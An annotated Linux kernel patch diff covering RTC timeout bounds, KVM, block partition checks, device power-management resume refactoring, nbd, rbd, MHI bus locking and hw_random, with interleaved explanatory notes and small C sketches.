+-		if (unlikely(mc146818_get_time(&curr_time) < 0)) {
++		if (unlikely(mc146818_get_time(&curr_time, 10) < 0)) {
+ 			pr_err_ratelimited("unable to read current time from RTC\n");
+ 			return IRQ_HANDLED;
+ 		}
+diff --git a/arch/x86/kernel/rtc.c b/arch/x86/kernel/rtc.c
+index 3490464345133..344c141133e4c 100644
+--- a/arch/x86/kernel/rtc.c
++++ b/arch/x86/kernel/rtc.c
+@@ -67,7 +67,7 @@ void mach_get_cmos_time(struct timespec64 *now)
+ 		return;
+ 	}
+ 
+-	if (mc146818_get_time(&tm)) {
++	if (mc146818_get_time(&tm, 1000)) {
+ 		pr_err("Unable to read current time from RTC\n");
+ 		now->tv_sec = now->tv_nsec = 0;
+ 		return;
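Both callers now pass a bound to mc146818_get_time(); the values (10 here in the HPET interrupt handler, 1000 in the sleepable paths) suggest milliseconds, so a stuck RTC update-in-progress (UIP) bit can no longer stall interrupt context indefinitely. A rough, self-contained sketch of the bounded-wait idea; the polling internals below are invented for illustration:

#include <stdbool.h>
#include <stdio.h>

/* Simulated RTC that clears its update-in-progress bit after a few polls. */
static int uip_polls_left = 3;
static bool uip_busy(void) { return uip_polls_left-- > 0; }
static void udelay_us(unsigned int us) { (void)us; /* busy-wait in-kernel */ }

/* Bounded UIP wait: interrupt context passes a small budget, sleepable
 * callers a generous one. */
static int wait_uip_clear(unsigned int timeout_ms)
{
	unsigned long waited_us = 0;

	while (uip_busy()) {
		if (waited_us >= timeout_ms * 1000UL)
			return -1;	/* give up instead of hanging */
		udelay_us(100);
		waited_us += 100;
	}
	return 0;
}

int main(void)
{
	printf("wait_uip_clear: %d\n", wait_uip_clear(10));
	return 0;
}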
+diff --git a/arch/x86/kvm/svm/nested.c b/arch/x86/kvm/svm/nested.c
+index bc288e6bde642..5d4d78c9a7872 100644
+--- a/arch/x86/kvm/svm/nested.c
++++ b/arch/x86/kvm/svm/nested.c
+@@ -239,18 +239,6 @@ static bool nested_svm_check_bitmap_pa(struct kvm_vcpu *vcpu, u64 pa, u32 size)
+ 	    kvm_vcpu_is_legal_gpa(vcpu, addr + size - 1);
+ }
+ 
+-static bool nested_svm_check_tlb_ctl(struct kvm_vcpu *vcpu, u8 tlb_ctl)
+-{
+-	/* Nested FLUSHBYASID is not supported yet.  */
+-	switch(tlb_ctl) {
+-		case TLB_CONTROL_DO_NOTHING:
+-		case TLB_CONTROL_FLUSH_ALL_ASID:
+-			return true;
+-		default:
+-			return false;
+-	}
+-}
+-
+ static bool __nested_vmcb_check_controls(struct kvm_vcpu *vcpu,
+ 					 struct vmcb_ctrl_area_cached *control)
+ {
+@@ -270,8 +258,6 @@ static bool __nested_vmcb_check_controls(struct kvm_vcpu *vcpu,
+ 					   IOPM_SIZE)))
+ 		return false;
+ 
+-	if (CC(!nested_svm_check_tlb_ctl(vcpu, control->tlb_ctl)))
+-		return false;
+ 
+ 	return true;
+ }
+diff --git a/block/ioctl.c b/block/ioctl.c
+index ebe4a2653622b..47567ba1185a6 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -20,8 +20,6 @@ static int blkpg_do_ioctl(struct block_device *bdev,
+ 	struct blkpg_partition p;
+ 	sector_t start, length;
+ 
+-	if (disk->flags & GENHD_FL_NO_PART)
+-		return -EINVAL;
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EACCES;
+ 	if (copy_from_user(&p, upart, sizeof(struct blkpg_partition)))
+diff --git a/block/partitions/core.c b/block/partitions/core.c
+index b8112f52d3880..3927f4283f6b6 100644
+--- a/block/partitions/core.c
++++ b/block/partitions/core.c
+@@ -453,6 +453,11 @@ int bdev_add_partition(struct gendisk *disk, int partno, sector_t start,
+ 		goto out;
+ 	}
+ 
++	if (disk->flags & GENHD_FL_NO_PART) {
++		ret = -EINVAL;
++		goto out;
++	}
++
+ 	if (partition_overlaps(disk, start, length, -1)) {
+ 		ret = -EBUSY;
+ 		goto out;
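Net effect of the two block hunks: the GENHD_FL_NO_PART test moves from the common blkpg ioctl entry point into bdev_add_partition(), so a disk that forbids partitions still rejects new ones while delete and resize requests proceed to their own validation (presumably so leftover partitions can still be removed). The resulting policy, reduced to a sketch with an assumed flag value:

#include <errno.h>
#include <stdbool.h>
#include <stdio.h>

#define GENHD_FL_NO_PART (1 << 2)	/* bit value assumed for the sketch */

/* After the fix, only the add path refuses no-partition disks. */
static int blkpg_sketch(unsigned int disk_flags, bool adding)
{
	if (adding && (disk_flags & GENHD_FL_NO_PART))
		return -EINVAL;
	return 0;	/* delete/resize fall through to their own checks */
}

int main(void)
{
	printf("add: %d, del: %d\n",
	       blkpg_sketch(GENHD_FL_NO_PART, true),
	       blkpg_sketch(GENHD_FL_NO_PART, false));
	return 0;
}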
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index 5dc9ccdd5a510..c73d1359b9d41 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -290,6 +290,7 @@ static struct crypto_larval *__crypto_register_alg(struct crypto_alg *alg)
+ 		}
+ 
+ 		if (!strcmp(q->cra_driver_name, alg->cra_name) ||
++		    !strcmp(q->cra_driver_name, alg->cra_driver_name) ||
+ 		    !strcmp(q->cra_name, alg->cra_driver_name))
+ 			goto err;
+ 	}
+diff --git a/drivers/base/power/main.c b/drivers/base/power/main.c
+index c501392077940..9c5a5f4dba5a6 100644
+--- a/drivers/base/power/main.c
++++ b/drivers/base/power/main.c
+@@ -579,7 +579,7 @@ bool dev_pm_skip_resume(struct device *dev)
+ }
+ 
+ /**
+- * device_resume_noirq - Execute a "noirq resume" callback for given device.
++ * __device_resume_noirq - Execute a "noirq resume" callback for given device.
+  * @dev: Device to handle.
+  * @state: PM transition of the system being carried out.
+  * @async: If true, the device is being resumed asynchronously.
+@@ -587,7 +587,7 @@ bool dev_pm_skip_resume(struct device *dev)
+  * The driver of @dev will not receive interrupts while this function is being
+  * executed.
+  */
+-static int device_resume_noirq(struct device *dev, pm_message_t state, bool async)
++static void __device_resume_noirq(struct device *dev, pm_message_t state, bool async)
+ {
+ 	pm_callback_t callback = NULL;
+ 	const char *info = NULL;
+@@ -655,7 +655,13 @@ Skip:
+ Out:
+ 	complete_all(&dev->power.completion);
+ 	TRACE_RESUME(error);
+-	return error;
++
++	if (error) {
++		suspend_stats.failed_resume_noirq++;
++		dpm_save_failed_step(SUSPEND_RESUME_NOIRQ);
++		dpm_save_failed_dev(dev_name(dev));
++		pm_dev_err(dev, state, async ? " async noirq" : " noirq", error);
++	}
+ }
+ 
+ static bool is_async(struct device *dev)
+@@ -668,27 +674,35 @@ static bool dpm_async_fn(struct device *dev, async_func_t func)
+ {
+ 	reinit_completion(&dev->power.completion);
+ 
+-	if (is_async(dev)) {
+-		get_device(dev);
+-		async_schedule_dev(func, dev);
++	if (!is_async(dev))
++		return false;
++
++	get_device(dev);
++
++	if (async_schedule_dev_nocall(func, dev))
+ 		return true;
+-	}
++
++	put_device(dev);
+ 
+ 	return false;
+ }
+ 
+ static void async_resume_noirq(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
+-	int error;
+-
+-	error = device_resume_noirq(dev, pm_transition, true);
+-	if (error)
+-		pm_dev_err(dev, pm_transition, " async", error);
++	struct device *dev = data;
+ 
++	__device_resume_noirq(dev, pm_transition, true);
+ 	put_device(dev);
+ }
+ 
++static void device_resume_noirq(struct device *dev)
++{
++	if (dpm_async_fn(dev, async_resume_noirq))
++		return;
++
++	__device_resume_noirq(dev, pm_transition, false);
++}
++
+ static void dpm_noirq_resume_devices(pm_message_t state)
+ {
+ 	struct device *dev;
+@@ -698,14 +712,6 @@ static void dpm_noirq_resume_devices(pm_message_t state)
+ 	mutex_lock(&dpm_list_mtx);
+ 	pm_transition = state;
+ 
+-	/*
+-	 * Advanced the async threads upfront,
+-	 * in case the starting of async threads is
+-	 * delayed by non-async resuming devices.
+-	 */
+-	list_for_each_entry(dev, &dpm_noirq_list, power.entry)
+-		dpm_async_fn(dev, async_resume_noirq);
+-
+ 	while (!list_empty(&dpm_noirq_list)) {
+ 		dev = to_device(dpm_noirq_list.next);
+ 		get_device(dev);
+@@ -713,17 +719,7 @@ static void dpm_noirq_resume_devices(pm_message_t state)
+ 
+ 		mutex_unlock(&dpm_list_mtx);
+ 
+-		if (!is_async(dev)) {
+-			int error;
+-
+-			error = device_resume_noirq(dev, state, false);
+-			if (error) {
+-				suspend_stats.failed_resume_noirq++;
+-				dpm_save_failed_step(SUSPEND_RESUME_NOIRQ);
+-				dpm_save_failed_dev(dev_name(dev));
+-				pm_dev_err(dev, state, " noirq", error);
+-			}
+-		}
++		device_resume_noirq(dev);
+ 
+ 		put_device(dev);
+ 
+@@ -751,14 +747,14 @@ void dpm_resume_noirq(pm_message_t state)
+ }
+ 
+ /**
+- * device_resume_early - Execute an "early resume" callback for given device.
++ * __device_resume_early - Execute an "early resume" callback for given device.
+  * @dev: Device to handle.
+  * @state: PM transition of the system being carried out.
+  * @async: If true, the device is being resumed asynchronously.
+  *
+  * Runtime PM is disabled for @dev while this function is being executed.
+  */
+-static int device_resume_early(struct device *dev, pm_message_t state, bool async)
++static void __device_resume_early(struct device *dev, pm_message_t state, bool async)
+ {
+ 	pm_callback_t callback = NULL;
+ 	const char *info = NULL;
+@@ -811,21 +807,31 @@ Out:
+ 
+ 	pm_runtime_enable(dev);
+ 	complete_all(&dev->power.completion);
+-	return error;
++
++	if (error) {
++		suspend_stats.failed_resume_early++;
++		dpm_save_failed_step(SUSPEND_RESUME_EARLY);
++		dpm_save_failed_dev(dev_name(dev));
++		pm_dev_err(dev, state, async ? " async early" : " early", error);
++	}
+ }
+ 
+ static void async_resume_early(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
+-	int error;
+-
+-	error = device_resume_early(dev, pm_transition, true);
+-	if (error)
+-		pm_dev_err(dev, pm_transition, " async", error);
++	struct device *dev = data;
+ 
++	__device_resume_early(dev, pm_transition, true);
+ 	put_device(dev);
+ }
+ 
++static void device_resume_early(struct device *dev)
++{
++	if (dpm_async_fn(dev, async_resume_early))
++		return;
++
++	__device_resume_early(dev, pm_transition, false);
++}
++
+ /**
+  * dpm_resume_early - Execute "early resume" callbacks for all devices.
+  * @state: PM transition of the system being carried out.
+@@ -839,14 +845,6 @@ void dpm_resume_early(pm_message_t state)
+ 	mutex_lock(&dpm_list_mtx);
+ 	pm_transition = state;
+ 
+-	/*
+-	 * Advanced the async threads upfront,
+-	 * in case the starting of async threads is
+-	 * delayed by non-async resuming devices.
+-	 */
+-	list_for_each_entry(dev, &dpm_late_early_list, power.entry)
+-		dpm_async_fn(dev, async_resume_early);
+-
+ 	while (!list_empty(&dpm_late_early_list)) {
+ 		dev = to_device(dpm_late_early_list.next);
+ 		get_device(dev);
+@@ -854,17 +852,7 @@ void dpm_resume_early(pm_message_t state)
+ 
+ 		mutex_unlock(&dpm_list_mtx);
+ 
+-		if (!is_async(dev)) {
+-			int error;
+-
+-			error = device_resume_early(dev, state, false);
+-			if (error) {
+-				suspend_stats.failed_resume_early++;
+-				dpm_save_failed_step(SUSPEND_RESUME_EARLY);
+-				dpm_save_failed_dev(dev_name(dev));
+-				pm_dev_err(dev, state, " early", error);
+-			}
+-		}
++		device_resume_early(dev);
+ 
+ 		put_device(dev);
+ 
+@@ -888,12 +876,12 @@ void dpm_resume_start(pm_message_t state)
+ EXPORT_SYMBOL_GPL(dpm_resume_start);
+ 
+ /**
+- * device_resume - Execute "resume" callbacks for given device.
++ * __device_resume - Execute "resume" callbacks for given device.
+  * @dev: Device to handle.
+  * @state: PM transition of the system being carried out.
+  * @async: If true, the device is being resumed asynchronously.
+  */
+-static int device_resume(struct device *dev, pm_message_t state, bool async)
++static void __device_resume(struct device *dev, pm_message_t state, bool async)
+ {
+ 	pm_callback_t callback = NULL;
+ 	const char *info = NULL;
+@@ -975,20 +963,30 @@ static int device_resume(struct device *dev, pm_message_t state, bool async)
+ 
+ 	TRACE_RESUME(error);
+ 
+-	return error;
++	if (error) {
++		suspend_stats.failed_resume++;
++		dpm_save_failed_step(SUSPEND_RESUME);
++		dpm_save_failed_dev(dev_name(dev));
++		pm_dev_err(dev, state, async ? " async" : "", error);
++	}
+ }
+ 
+ static void async_resume(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
+-	int error;
++	struct device *dev = data;
+ 
+-	error = device_resume(dev, pm_transition, true);
+-	if (error)
+-		pm_dev_err(dev, pm_transition, " async", error);
++	__device_resume(dev, pm_transition, true);
+ 	put_device(dev);
+ }
+ 
++static void device_resume(struct device *dev)
++{
++	if (dpm_async_fn(dev, async_resume))
++		return;
++
++	__device_resume(dev, pm_transition, false);
++}
++
+ /**
+  * dpm_resume - Execute "resume" callbacks for non-sysdev devices.
+  * @state: PM transition of the system being carried out.
+@@ -1008,27 +1006,17 @@ void dpm_resume(pm_message_t state)
+ 	pm_transition = state;
+ 	async_error = 0;
+ 
+-	list_for_each_entry(dev, &dpm_suspended_list, power.entry)
+-		dpm_async_fn(dev, async_resume);
+-
+ 	while (!list_empty(&dpm_suspended_list)) {
+ 		dev = to_device(dpm_suspended_list.next);
++
+ 		get_device(dev);
+-		if (!is_async(dev)) {
+-			int error;
+ 
+-			mutex_unlock(&dpm_list_mtx);
++		mutex_unlock(&dpm_list_mtx);
++
++		device_resume(dev);
+ 
+-			error = device_resume(dev, state, false);
+-			if (error) {
+-				suspend_stats.failed_resume++;
+-				dpm_save_failed_step(SUSPEND_RESUME);
+-				dpm_save_failed_dev(dev_name(dev));
+-				pm_dev_err(dev, state, "", error);
+-			}
++		mutex_lock(&dpm_list_mtx);
+ 
+-			mutex_lock(&dpm_list_mtx);
+-		}
+ 		if (!list_empty(&dev->power.entry))
+ 			list_move_tail(&dev->power.entry, &dpm_prepared_list);
+ 
+@@ -1269,7 +1257,7 @@ Complete:
+ 
+ static void async_suspend_noirq(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
++	struct device *dev = data;
+ 	int error;
+ 
+ 	error = __device_suspend_noirq(dev, pm_transition, true);
+@@ -1450,7 +1438,7 @@ Complete:
+ 
+ static void async_suspend_late(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
++	struct device *dev = data;
+ 	int error;
+ 
+ 	error = __device_suspend_late(dev, pm_transition, true);
+@@ -1727,7 +1715,7 @@ static int __device_suspend(struct device *dev, pm_message_t state, bool async)
+ 
+ static void async_suspend(void *data, async_cookie_t cookie)
+ {
+-	struct device *dev = (struct device *)data;
++	struct device *dev = data;
+ 	int error;
+ 
+ 	error = __device_suspend(dev, pm_transition, true);
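The theme of this power/main.c refactor: the __device_resume*() workers now record their own failure statistics and return void, and each per-device entry point first offers the work to an async thread via dpm_async_fn(). The new async_schedule_dev_nocall() is assumed to report whether a worker was actually scheduled, letting the caller drop its device reference and fall back to a synchronous resume instead of leaking it. The dispatch shape, minus the is_async() policy check:

#include <stdbool.h>
#include <stdio.h>

/* Minimal stand-ins so the sketch is self-contained. */
struct device { const char *name; int refs; };
static void get_device(struct device *d) { d->refs++; }
static void put_device(struct device *d) { d->refs--; }

/* Assumed semantics of async_schedule_dev_nocall(): true only if an
 * async worker really took ownership of 'dev'. */
static bool async_schedule_nocall(void (*fn)(struct device *),
				  struct device *d)
{
	(void)fn; (void)d;
	return false;	/* pretend no async thread was available */
}

static void __device_resume(struct device *d, bool async)
{
	printf("resume %s (%s)\n", d->name, async ? "async" : "sync");
}

static void async_resume(struct device *d)
{
	__device_resume(d, true);
	put_device(d);		/* ref taken by the dispatcher below */
}

/* The pattern from the hunk: take a ref for the worker, and undo it on
 * fallback so nothing leaks. */
static void device_resume(struct device *d)
{
	get_device(d);
	if (async_schedule_nocall(async_resume, d))
		return;
	put_device(d);
	__device_resume(d, false);
}

int main(void)
{
	struct device d = { "dev0", 1 };

	device_resume(&d);
	printf("refs back to %d\n", d.refs);
	return 0;
}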
+diff --git a/drivers/base/power/trace.c b/drivers/base/power/trace.c
+index 72b7a92337b18..cd6e559648b21 100644
+--- a/drivers/base/power/trace.c
++++ b/drivers/base/power/trace.c
+@@ -120,7 +120,7 @@ static unsigned int read_magic_time(void)
+ 	struct rtc_time time;
+ 	unsigned int val;
+ 
+-	if (mc146818_get_time(&time) < 0) {
++	if (mc146818_get_time(&time, 1000) < 0) {
+ 		pr_err("Unable to read current time from RTC\n");
+ 		return 0;
+ 	}
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index 8037aaefeb2ed..9a53165de4cef 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -494,7 +494,7 @@ static int __sock_xmit(struct nbd_device *nbd, struct socket *sock, int send,
+ 		       struct iov_iter *iter, int msg_flags, int *sent)
+ {
+ 	int result;
+-	struct msghdr msg;
++	struct msghdr msg = { };
+ 	unsigned int noreclaim_flag;
+ 
+ 	if (unlikely(!sock)) {
+@@ -509,10 +509,6 @@ static int __sock_xmit(struct nbd_device *nbd, struct socket *sock, int send,
+ 	noreclaim_flag = memalloc_noreclaim_save();
+ 	do {
+ 		sock->sk->sk_allocation = GFP_NOIO | __GFP_MEMALLOC;
+-		msg.msg_name = NULL;
+-		msg.msg_namelen = 0;
+-		msg.msg_control = NULL;
+-		msg.msg_controllen = 0;
+ 		msg.msg_flags = msg_flags | MSG_NOSIGNAL;
+ 
+ 		if (send)
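Zero-initializing msghdr at declaration replaces the per-iteration NULL stores and, more usefully, covers every field the old code never mentioned, so nothing in the struct reaches kernel_sendmsg()/kernel_recvmsg() as stack garbage. The idiom in miniature (msghdr_like is a made-up stand-in):

#include <stdio.h>

struct msghdr_like {
	void *name; int namelen;
	void *control; int controllen;
	unsigned int flags;
};

int main(void)
{
	/* Empty initializer: every member zeroed, including any the old
	 * field-by-field code never mentioned. */
	struct msghdr_like msg = { };

	printf("flags=%u control=%p\n", msg.flags, msg.control);
	return 0;
}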
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index afc92869cba42..f58ca9ce35031 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -3453,14 +3453,15 @@ static bool rbd_lock_add_request(struct rbd_img_request *img_req)
+ static void rbd_lock_del_request(struct rbd_img_request *img_req)
+ {
+ 	struct rbd_device *rbd_dev = img_req->rbd_dev;
+-	bool need_wakeup;
++	bool need_wakeup = false;
+ 
+ 	lockdep_assert_held(&rbd_dev->lock_rwsem);
+ 	spin_lock(&rbd_dev->lock_lists_lock);
+-	rbd_assert(!list_empty(&img_req->lock_item));
+-	list_del_init(&img_req->lock_item);
+-	need_wakeup = (rbd_dev->lock_state == RBD_LOCK_STATE_RELEASING &&
+-		       list_empty(&rbd_dev->running_list));
++	if (!list_empty(&img_req->lock_item)) {
++		list_del_init(&img_req->lock_item);
++		need_wakeup = (rbd_dev->lock_state == RBD_LOCK_STATE_RELEASING &&
++			       list_empty(&rbd_dev->running_list));
++	}
+ 	spin_unlock(&rbd_dev->lock_lists_lock);
+ 	if (need_wakeup)
+ 		complete(&rbd_dev->releasing_wait);
+@@ -3843,14 +3844,19 @@ static void wake_lock_waiters(struct rbd_device *rbd_dev, int result)
+ 		return;
+ 	}
+ 
+-	list_for_each_entry(img_req, &rbd_dev->acquiring_list, lock_item) {
++	while (!list_empty(&rbd_dev->acquiring_list)) {
++		img_req = list_first_entry(&rbd_dev->acquiring_list,
++					   struct rbd_img_request, lock_item);
+ 		mutex_lock(&img_req->state_mutex);
+ 		rbd_assert(img_req->state == RBD_IMG_EXCLUSIVE_LOCK);
++		if (!result)
++			list_move_tail(&img_req->lock_item,
++				       &rbd_dev->running_list);
++		else
++			list_del_init(&img_req->lock_item);
+ 		rbd_img_schedule(img_req, result);
+ 		mutex_unlock(&img_req->state_mutex);
+ 	}
+-
+-	list_splice_tail_init(&rbd_dev->acquiring_list, &rbd_dev->running_list);
+ }
+ 
+ static bool locker_equal(const struct ceph_locker *lhs,
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index edd153dda40c0..34e0ba6f52d05 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -71,45 +71,77 @@ err_unlock:
+ static int mhi_ep_send_completion_event(struct mhi_ep_cntrl *mhi_cntrl, struct mhi_ep_ring *ring,
+ 					struct mhi_ring_element *tre, u32 len, enum mhi_ev_ccs code)
+ {
+-	struct mhi_ring_element event = {};
++	struct mhi_ring_element *event;
++	int ret;
++
++	event = kzalloc(sizeof(struct mhi_ring_element), GFP_KERNEL);
++	if (!event)
++		return -ENOMEM;
+ 
+-	event.ptr = cpu_to_le64(ring->rbase + ring->rd_offset * sizeof(*tre));
+-	event.dword[0] = MHI_TRE_EV_DWORD0(code, len);
+-	event.dword[1] = MHI_TRE_EV_DWORD1(ring->ch_id, MHI_PKT_TYPE_TX_EVENT);
++	event->ptr = cpu_to_le64(ring->rbase + ring->rd_offset * sizeof(*tre));
++	event->dword[0] = MHI_TRE_EV_DWORD0(code, len);
++	event->dword[1] = MHI_TRE_EV_DWORD1(ring->ch_id, MHI_PKT_TYPE_TX_EVENT);
+ 
+-	return mhi_ep_send_event(mhi_cntrl, ring->er_index, &event, MHI_TRE_DATA_GET_BEI(tre));
++	ret = mhi_ep_send_event(mhi_cntrl, ring->er_index, event, MHI_TRE_DATA_GET_BEI(tre));
++	kfree(event);
++
++	return ret;
+ }
+ 
+ int mhi_ep_send_state_change_event(struct mhi_ep_cntrl *mhi_cntrl, enum mhi_state state)
+ {
+-	struct mhi_ring_element event = {};
++	struct mhi_ring_element *event;
++	int ret;
++
++	event = kzalloc(sizeof(struct mhi_ring_element), GFP_KERNEL);
++	if (!event)
++		return -ENOMEM;
+ 
+-	event.dword[0] = MHI_SC_EV_DWORD0(state);
+-	event.dword[1] = MHI_SC_EV_DWORD1(MHI_PKT_TYPE_STATE_CHANGE_EVENT);
++	event->dword[0] = MHI_SC_EV_DWORD0(state);
++	event->dword[1] = MHI_SC_EV_DWORD1(MHI_PKT_TYPE_STATE_CHANGE_EVENT);
+ 
+-	return mhi_ep_send_event(mhi_cntrl, 0, &event, 0);
++	ret = mhi_ep_send_event(mhi_cntrl, 0, event, 0);
++	kfree(event);
++
++	return ret;
+ }
+ 
+ int mhi_ep_send_ee_event(struct mhi_ep_cntrl *mhi_cntrl, enum mhi_ee_type exec_env)
+ {
+-	struct mhi_ring_element event = {};
++	struct mhi_ring_element *event;
++	int ret;
++
++	event = kzalloc(sizeof(struct mhi_ring_element), GFP_KERNEL);
++	if (!event)
++		return -ENOMEM;
+ 
+-	event.dword[0] = MHI_EE_EV_DWORD0(exec_env);
+-	event.dword[1] = MHI_SC_EV_DWORD1(MHI_PKT_TYPE_EE_EVENT);
++	event->dword[0] = MHI_EE_EV_DWORD0(exec_env);
++	event->dword[1] = MHI_SC_EV_DWORD1(MHI_PKT_TYPE_EE_EVENT);
+ 
+-	return mhi_ep_send_event(mhi_cntrl, 0, &event, 0);
++	ret = mhi_ep_send_event(mhi_cntrl, 0, event, 0);
++	kfree(event);
++
++	return ret;
+ }
+ 
+ static int mhi_ep_send_cmd_comp_event(struct mhi_ep_cntrl *mhi_cntrl, enum mhi_ev_ccs code)
+ {
+ 	struct mhi_ep_ring *ring = &mhi_cntrl->mhi_cmd->ring;
+-	struct mhi_ring_element event = {};
++	struct mhi_ring_element *event;
++	int ret;
++
++	event = kzalloc(sizeof(struct mhi_ring_element), GFP_KERNEL);
++	if (!event)
++		return -ENOMEM;
+ 
+-	event.ptr = cpu_to_le64(ring->rbase + ring->rd_offset * sizeof(struct mhi_ring_element));
+-	event.dword[0] = MHI_CC_EV_DWORD0(code);
+-	event.dword[1] = MHI_CC_EV_DWORD1(MHI_PKT_TYPE_CMD_COMPLETION_EVENT);
++	event->ptr = cpu_to_le64(ring->rbase + ring->rd_offset * sizeof(struct mhi_ring_element));
++	event->dword[0] = MHI_CC_EV_DWORD0(code);
++	event->dword[1] = MHI_CC_EV_DWORD1(MHI_PKT_TYPE_CMD_COMPLETION_EVENT);
+ 
+-	return mhi_ep_send_event(mhi_cntrl, 0, &event, 0);
++	ret = mhi_ep_send_event(mhi_cntrl, 0, event, 0);
++	kfree(event);
++
++	return ret;
+ }
+ 
+ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_element *el)
+diff --git a/drivers/bus/mhi/host/main.c b/drivers/bus/mhi/host/main.c
+index 0c3a009ed9bb0..8378c3319cd5c 100644
+--- a/drivers/bus/mhi/host/main.c
++++ b/drivers/bus/mhi/host/main.c
+@@ -268,7 +268,8 @@ static void mhi_del_ring_element(struct mhi_controller *mhi_cntrl,
+ 
+ static bool is_valid_ring_ptr(struct mhi_ring *ring, dma_addr_t addr)
+ {
+-	return addr >= ring->iommu_base && addr < ring->iommu_base + ring->len;
++	return addr >= ring->iommu_base && addr < ring->iommu_base + ring->len &&
++			!(addr & (sizeof(struct mhi_ring_element) - 1));
+ }
+ 
+ int mhi_destroy_device(struct device *dev, void *data)
+@@ -642,6 +643,8 @@ static int parse_xfer_event(struct mhi_controller *mhi_cntrl,
+ 			mhi_del_ring_element(mhi_cntrl, tre_ring);
+ 			local_rp = tre_ring->rp;
+ 
++			read_unlock_bh(&mhi_chan->lock);
++
+ 			/* notify client */
+ 			mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
+ 
+@@ -667,6 +670,8 @@ static int parse_xfer_event(struct mhi_controller *mhi_cntrl,
+ 					kfree(buf_info->cb_buf);
+ 				}
+ 			}
++
++			read_lock_bh(&mhi_chan->lock);
+ 		}
+ 		break;
+ 	} /* CC_EOT */
+@@ -1119,17 +1124,15 @@ static int mhi_queue(struct mhi_device *mhi_dev, struct mhi_buf_info *buf_info,
+ 	if (unlikely(MHI_PM_IN_ERROR_STATE(mhi_cntrl->pm_state)))
+ 		return -EIO;
+ 
+-	read_lock_irqsave(&mhi_cntrl->pm_lock, flags);
+-
+ 	ret = mhi_is_ring_full(mhi_cntrl, tre_ring);
+-	if (unlikely(ret)) {
+-		ret = -EAGAIN;
+-		goto exit_unlock;
+-	}
++	if (unlikely(ret))
++		return -EAGAIN;
+ 
+ 	ret = mhi_gen_tre(mhi_cntrl, mhi_chan, buf_info, mflags);
+ 	if (unlikely(ret))
+-		goto exit_unlock;
++		return ret;
++
++	read_lock_irqsave(&mhi_cntrl->pm_lock, flags);
+ 
+ 	/* Packet is queued, take a usage ref to exit M3 if necessary
+ 	 * for host->device buffer, balanced put is done on buffer completion
+@@ -1149,7 +1152,6 @@ static int mhi_queue(struct mhi_device *mhi_dev, struct mhi_buf_info *buf_info,
+ 	if (dir == DMA_FROM_DEVICE)
+ 		mhi_cntrl->runtime_put(mhi_cntrl);
+ 
+-exit_unlock:
+ 	read_unlock_irqrestore(&mhi_cntrl->pm_lock, flags);
+ 
+ 	return ret;
+@@ -1201,6 +1203,9 @@ int mhi_gen_tre(struct mhi_controller *mhi_cntrl, struct mhi_chan *mhi_chan,
+ 	int eot, eob, chain, bei;
+ 	int ret;
+ 
++	/* Protect accesses for reading and incrementing WP */
++	write_lock_bh(&mhi_chan->lock);
++
+ 	buf_ring = &mhi_chan->buf_ring;
+ 	tre_ring = &mhi_chan->tre_ring;
+ 
+@@ -1218,8 +1223,10 @@ int mhi_gen_tre(struct mhi_controller *mhi_cntrl, struct mhi_chan *mhi_chan,
+ 
+ 	if (!info->pre_mapped) {
+ 		ret = mhi_cntrl->map_single(mhi_cntrl, buf_info);
+-		if (ret)
++		if (ret) {
++			write_unlock_bh(&mhi_chan->lock);
+ 			return ret;
++		}
+ 	}
+ 
+ 	eob = !!(flags & MHI_EOB);
+@@ -1236,6 +1243,8 @@ int mhi_gen_tre(struct mhi_controller *mhi_cntrl, struct mhi_chan *mhi_chan,
+ 	mhi_add_ring_element(mhi_cntrl, tre_ring);
+ 	mhi_add_ring_element(mhi_cntrl, buf_ring);
+ 
++	write_unlock_bh(&mhi_chan->lock);
++
+ 	return 0;
+ }
+ 
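Two independent hardenings in this host-side hunk: is_valid_ring_ptr() now also insists the device-supplied address is aligned to the ring-element size (a power of two, so a single mask does it), and the channel lock is dropped around the client xfer_cb() while mhi_gen_tre() takes it as a writer to serialize write-pointer updates. The alignment check on its own:

#include <stdint.h>
#include <stdio.h>

struct mhi_ring_element { uint64_t ptr; uint32_t dword[2]; }; /* 16 bytes */

static int ptr_ok(uint64_t base, uint64_t len, uint64_t addr)
{
	return addr >= base && addr < base + len &&
	       !(addr & (sizeof(struct mhi_ring_element) - 1));
}

int main(void)
{
	printf("%d\n", ptr_ok(0x1000, 0x100, 0x1010)); /* 1: in range, aligned */
	printf("%d\n", ptr_ok(0x1000, 0x100, 0x1018)); /* 0: misaligned */
	return 0;
}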
+diff --git a/drivers/char/hw_random/core.c b/drivers/char/hw_random/core.c
+index 8f31f9d810305..c319f99377096 100644
+--- a/drivers/char/hw_random/core.c
++++ b/drivers/char/hw_random/core.c
+@@ -24,10 +24,13 @@
+ #include <linux/random.h>
+ #include <linux/sched.h>
+ #include <linux/slab.h>
++#include <linux/string.h>
+ #include <linux/uaccess.h>
+ 
+ #define RNG_MODULE_NAME		"hw_random"
+ 
++#define RNG_BUFFER_SIZE (SMP_CACHE_BYTES < 32 ? 32 : SMP_CACHE_BYTES)
++
+ static struct hwrng *current_rng;
+ /* the current rng has been explicitly chosen by user via sysfs */
+ static int cur_rng_set_by_user;
+@@ -59,7 +62,7 @@ static inline int rng_get_data(struct hwrng *rng, u8 *buffer, size_t size,
+ 
+ static size_t rng_buffer_size(void)
+ {
+-	return SMP_CACHE_BYTES < 32 ? 32 : SMP_CACHE_BYTES;
++	return RNG_BUFFER_SIZE;
+ }
+ 
